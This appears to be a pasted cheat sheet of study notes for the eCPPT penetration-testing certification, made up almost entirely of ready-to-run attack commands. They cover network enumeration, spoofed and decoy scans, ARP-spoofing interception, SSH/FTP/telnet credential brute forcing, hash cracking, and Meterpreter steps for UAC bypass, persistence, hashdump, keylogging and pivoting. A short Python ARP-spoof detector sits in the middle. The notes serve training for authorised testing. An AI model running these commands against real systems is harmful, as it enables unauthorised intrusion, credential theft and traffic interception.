a guest
Jun 15th, 2018
eCPPT NETWORK SECURITY

*DNS Enumeration

nslookup example.com
nslookup -query=mx domain
nslookup -query=ns domain
nslookup -query=any domain

interactive mode {
set q=ns domain
set q=mx domain
set q=cname domain
}

dig domain
dig domain A
dig domain NS
dig +nocmd domain MX +noall +answer
dig +nocmd domain AXFR +noall +answer @vulnDNS

fierce -dns domain
fierce -dns domain -dnsserver vuln.DNS

dnsenum domain
dnsenum domain --dnsserver vuln.DNS
dnsenum domain -f host.list

dnsmap domain
dnsrecon -d domain

*NETBIOS
windows commands

nbtstat -A $IP
net view $IP
net use /?
net use \\resource\path

** NetBIOS auditing tool **
nat.exe -u userlist -p passwordlist $IP
winfingerprint GUI tool

NULLSESSION
net use \\source\ipc$ "" /user:""

SID2USER (replace the dashes in the SID with spaces)
sid2user.exe \\source $SID
sid2user.exe \\source $SID 500 (admin)
sid2user.exe \\source $SID 501 (guest)
sid2user.exe \\source $SID 1000 (first account created by a user)

dumpsec GUI tool

linux commands

*polenum
*ldapscripts

enum4linux -a -v $IP
smbclient -L $IP
smbclient \\\\$IP\\folderToAccess

*SNMP Enumeration

snmpwalk -h
snmpwalk -v 2c -c public $IP
snmpwalk -v 2c -c public $IP hrSWInstalledName
snmpwalk -v 2c -c public $IP hrMemorySize
snmpwalk -v 2c -c public $IP sysContact

snmpset -v 2c -c public $IP sysContact.0 s value
nmap -sU -p 161 --script snmp-win32-services $IP
nmap -sU -p 161 --script snmp-brute $IP
nmap -sU -p 161 --script snmp-win32-users $IP

SCANNING

*Idle scan: hping3 & nmap commands

hping3 -S -r $IP -p 135 # syn scan, -r shows the relative IP ID
if the target responds with id +1 every time, it is a good zombie; in general the IP ID must be incremental

hping3 -a $ZIP -S $VIP -p 23 # spoof source IP
ZIP = zombie, VIP = victim. If the zombie now responds with id +2, port 23 is open

nmap --script ipidseq $IP -p 135
checks whether the IP ID sequence is incremental
nmap -O -v $IP -p 135

nmap -sI $zip:135 $vip -p 23 --packet-trace
zombie idle scan (-sI)

hping3 -S -r $vip -p 135 +
nmap -S $zip $vip -p 23 -Pn -e eth0 -n --disable-arp-ping
if the response comes back with an incremented id, the port is open

*NMAP scan and NSE scripting

nmap --script-help "smb-* and discovery"
how to search for NSE scripts

nmap --script auth $IP
runs all auth NSE scripts
nmap --script default $IP

nmap -f $vip -n -p80 --disable-arp-ping -Pn
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 100
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 48
every fragment carries 8 bytes
nmap -f -f -sS $vip -p 80 -Pn -n --disable-arp-ping
(every fragment carries 16 bytes)

*Using Decoys (popular idle scans)

nmap -p 80 -D $dec1,ME,$dec2 $vip
nmap -D RND:10 $vip -sS -p 80 -Pn --disable-arp-ping
hping3 --rand-source -S -p 80 $vip -c 3
hping3 -a $spoofIP -S -p 80 $vip
nmap --source-port 53 $vip -sS
DNS (port 53) is usually allowed through firewalls
hping3 -S -s 53 --scan known $vip
nmap -sS --data-length 10 -p 21 $vip
hping3 -S -p 21 --data 24 $vip
nmap --spoof-mac apple $vip -p 80 -Pn --disable-arp-ping -n
nmap --spoof-mac 0 $vip -p 80 -Pn --disable-arp-ping -n
nmap --spoof-mac 00:11:22:33:44:55 $vip -p 80 -Pn --disable-arp-ping -n
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts -T2
hping3 -1 --rand-dest 192.168.1.x -I eth0
hping3 --scan 80,443,21,22 $vip -i u10

Man In The Middle ATTACKS

*SNIFFING TRAFFIC

tcpdump --help
tcpdump -D // list interfaces
tcpdump -i eth0
tcpdump -i eth0 -v
tcpdump -i eth0 -n // disable DNS resolution
tcpdump -i eth0 -q // quiet output
tcpdump -i eth0 host $IP // sniff a specific host or IP
tcpdump -i eth0 src $sourceaddr dst $destinaddr
tcpdump -i eth0 -F filter.file // read the filter expression (e.g. a port number) from a file
tcpdump -i eth0 -c 150 // number of packets to capture
tcpdump -i eth0 -w output_file.txt // save the capture to a file
tcpdump -i eth0 -r output_file.txt // read the capture back
tcpdump -i eth0 | grep $IP

*MITM

Promiscuous mode allows the network interface card to accept and process every packet it receives, not only those addressed to it
A switch forwards traffic only to the port of the requested destination
ettercap
bettercap
mitmf
sslstrip

// enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

// ARP spoofing [2 way] [
arpspoof -i eth0 -t $targetIP $impersonateIP
arpspoof -i eth0 -t $impersonateIP $targetIP
]
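The two arpspoof lines above rewrite the ARP caches of the victim and the gateway, and that rebinding is what a defender can watch for on the LAN. As an added example that is not part of the original paste, here is a small arpwatch-style detector in Python that replays constructed ARP replies and flags every IP whose advertised MAC changes; the addresses, the ArpReply record and the sample traffic are all made up for the demonstration.

```python
from collections import namedtuple

# Constructed ARP reply record: timestamp, sender IP and sender MAC as seen on the wire.
ArpReply = namedtuple("ArpReply", "ts sender_ip sender_mac")

# Constructed sample traffic: 192.168.1.1 (gateway) and 192.168.1.50 (victim) answer
# normally, then a third station (..:99) starts claiming both addresses, which is the
# two-way poisoning pattern the arpspoof pair above produces.
SAMPLE_REPLIES = [
    ArpReply(1.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    ArpReply(1.2, "192.168.1.50", "aa:bb:cc:00:00:50"),
    ArpReply(2.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    ArpReply(5.0, "192.168.1.1", "aa:bb:cc:00:00:99"),   # gateway re-bound
    ArpReply(5.1, "192.168.1.50", "aa:bb:cc:00:00:99"),  # victim re-bound
    ArpReply(7.0, "192.168.1.1", "aa:bb:cc:00:00:99"),   # poisoning keeps going
]


def detect_arp_spoof(replies):
    """Return (ts, ip, known_mac, new_mac) for every reply that contradicts the
    first MAC seen for that IP. The known binding is never overwritten, so a
    sustained attack keeps producing alerts, like arpwatch's flip-flop reports."""
    bindings = {}
    alerts = []
    for r in replies:
        mac = r.sender_mac.lower()
        known = bindings.get(r.sender_ip)
        if known is None:
            bindings[r.sender_ip] = mac
        elif known != mac:
            alerts.append((r.ts, r.sender_ip, known, mac))
    return alerts


def suspect_macs(alerts):
    """A MAC that newly claims two or more different IPs is the likely spoofer:
    in a two-way attack one station impersonates both the gateway and the victim."""
    claimed = {}
    for _, ip, _, new_mac in alerts:
        claimed.setdefault(new_mac, set()).add(ip)
    return {mac for mac, ips in claimed.items() if len(ips) >= 2}


if __name__ == "__main__":
    found = detect_arp_spoof(SAMPLE_REPLIES)
    for ts, ip, old, new in found:
        print(f"t={ts}: {ip} moved from {old} to {new}")
    print("suspect MAC(s):", suspect_macs(found))
```

On a real network the same logic runs over ARP replies read from a capture (for example the tcpdump -w output above), and a static ARP entry for the gateway or dynamic ARP inspection on the switch stops the rebinding in the first place.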

dsniff -i eth0 // grabs cleartext (e.g. basic auth) credentials

bettercap -h
bettercap -I eth0 -X -G $target1 -T $target2ip // sniffing mode

EXPLOITATION

*Auth Bruteforce

ncrack -vv -U userlist -P passlist 192.168.1.1 -p @telnet
medusa -h 192.168.1.1 -M ssh -U userlist -P passlist
hydra -L userlist -P passlist ssh://192.168.1.1
hydra -L userlist -P passlist ssh://192.168.1.1 -T 50
patator ftp_login --help
patator ftp_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ignore:mesg="Login incorrect"
patator ssh_login host=192.168.1.1 user="test" password="test"
patator ssh_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ignore:mesg="Filter To Use"
patator telnet_login inputs="FILE0\nFILE1\n" host=192.168.1.1 0=userlist 1=passlist -x ignore:mesg="Filter To Use"

*LM_NTLM crack

use auxiliary/server/capture/smb
set JOHNPWFILE hashes

rcracki_mt -h 8818c6a2a95684g4 -t 4 *.rti // needs a rainbow table (.rti) file; -h takes 8 bytes of the LM hash (16 chars); -t = threads

netntlm --file /file/challenge_response --seed passdiscovered // recovers (if cracked) the password
netntlm --file /file/challenge_response --seed fullpass // case sensitive

POST EXPLOITATION

*Privilege Escalation on Windows

> sysinfo
> getprivs // list session privileges
> run post/windows/gather/win_privs // list all machine privileges and UAC status
use exploit/windows/local/bypassuac_injection // try to bypass UAC

- exploit suggester

// external tools
UACme

*Privilege Escalation on Linux

sysinfo

- exploit suggester

> execute -f /bin/sh -i -c // create a new channel and interact with it

*Maintain Access & Persistence
(inside meterpreter)

- migrate to another process
- hashdump OR post/windows/gather/smart_hashdump
- psexec

Adding a new user to the remote system

- run getgui -e -u user -p pass // adds a new user and enables RDP (connect with xfreerdp /v:$IP /u:$user /p:$pass)
- exploit/windows/local/persistence

*Pillaging

shell > systeminfo
meterpreter > post/windows/gather/*
> search -f *.kdb -r -d // searching for specific files
> post/windows/capture/* // keylogger
shell > ipconfig /all
# > route and/or arp
# > netstat -ano
# > wmic /?
# > wmic service /?
# > wmic service get caption,started
# > wmic service where started=true get caption

*Mapping Internal network

shell > ipconfig /all
meterpreter > arp & route
shell > ipconfig /displaydns
# > netstat -ano
# > netstat -b
msf > post/multi/gather/ping_sweep
meterpreter > run arp_scan -r $IP/*
msf > post/windows/manage/autoroute // add a route so the internal network can be scanned
# > auxiliary/server/socks4a // configure a SOCKS proxy (edit proxychains)
meterpreter > portfwd add -l 8080 -p 80 -r $RemoteIP // l = local port, p = remote port, r = remote host